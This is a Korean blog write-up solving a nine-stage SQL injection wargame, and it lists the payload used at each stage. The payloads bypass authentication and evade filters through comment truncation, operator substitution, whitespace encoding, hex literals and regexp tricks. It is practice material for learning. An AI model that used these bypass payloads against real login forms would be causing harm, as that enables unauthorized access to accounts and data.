본문으로 바로가기

itchy's Funny injection 풀이

category Wargame 2014. 6. 18. 19:07
반응형

총 9단계로 이뤄진 간단한 SQL Injection 워게임 사이트이다. (http://itchy.dothome.co.kr)

단계별로 올라갈수록 필터링이 하나하나 추가되는 방식이며 아래의 페이로드 말고도

다른 방법들이 충분히 존재할 수 있으므로 시험끝나고 다시 한번 풀어봐야겠다.

 

Stage 1.

id=admin'%23&pw=a

 

Stage 2. id에 # 와 -- 에 대한 필터링 추가)

id=admin' or '=&pw=a

 

Stage 3. id와 pw 모두 and 와 or 에 대한 필터링 추가)

id=admin'||'=&pw=a

 

Stage 4. id와 pw 모두 admin , 공백에 대한 필터링 추가)

id=ad'%0d'min&pw='<>1=1%23

id='||id%0dlike%0d'adm%'/*&pw=*/%23

id='||id%0dregexp%0d'adm'/*&pw=*/%23

id='||id=0x61646d696e||&pw='||1%23

 

Stage 5. id와 pw 모두 = , like에 대한 필터링 추가)

id=adm'%0d'in&pw='<>1%0din(1)%23

id='||1<2%0dgroup%0dby%0d1/*&pw=*/%23

id='||%0dascii(substr(reverse('nimda'),1,1))>10%26%26id%0dregexp%0d'adm'/*&pw=*/%23

 

Stage6. id와 pw ||, && 에 대한 필터링 추가)

id=adm'%0d'in&pw='<>1%0din(1)%23

id=adm'%0d'in&pw='<2%23

 

Stage 7. pw에 md5 함수를 추가 

id=adm'%0d'in'%2F*&pw=*%2F%23

 

Stage 8. id와 pw 모두 / 와 * 에 필터링 추가

id=adm'%0d'in&pw=')<2%23

 

Stage 9. id와 pw모두 mysql_real_escape_string 함수와 md5 두번째 인자에 true 추가(md5(text,true))

http://hides.tistory.com/250 참고

반응형

'Wargame' 카테고리의 다른 글

Lord of SQL Injection Gremlin ~ AllClear  (0) 2016.02.18
itchy's Funny injection 풀이  (0) 2014.06.18
국내 워게임 사이트  (0) 2014.05.04

댓글을 달아 주세요